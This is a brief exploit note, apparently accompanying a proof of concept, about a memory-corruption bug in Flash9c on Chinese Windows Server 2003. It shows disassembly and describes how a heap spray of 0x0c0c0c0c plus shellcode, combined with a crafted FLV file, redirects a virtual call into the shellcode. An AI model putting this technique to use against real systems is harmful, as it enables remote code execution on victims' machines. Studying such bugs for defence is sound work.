test on windows server 2003 Chinese, yunshu, www.ph4nt0m.org
3019CE18 C1E9 02 SHR ECX,2
3019CE1B 83E2 03 AND EDX,3
3019CE1E 83F9 08 CMP ECX,8
3019CE21 72 29 JB SHORT Flash9c.3019CE4C
3019CE23 F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
300ED77D 85C9 TEST ECX,ECX
300ED77F 0F84 00070000 JE Flash9c.300EDE85
300ED785 8B01 MOV EAX,DWORD PTR DS:[ECX]
300ED787 FF50 20 CALL DWORD PTR DS:[EAX+20]
When use heap spray, this will change ecx,so I let this js script run heap spray first.
ALl memory is alloted,then load the flv file, and the ecx will be change to 0c0c0c0c which writen in 1.flv.
00000000-0c0c0c0c is filled by 0c0c0c0c and shellcode. so CALL DWORD PTR DS:[EAX+20] will call 0x0c0c0c0c,and
0x0c0c0c0c 's content is 0c0c0c0c, then run the shellcode.
^_^,maybe you should do some change!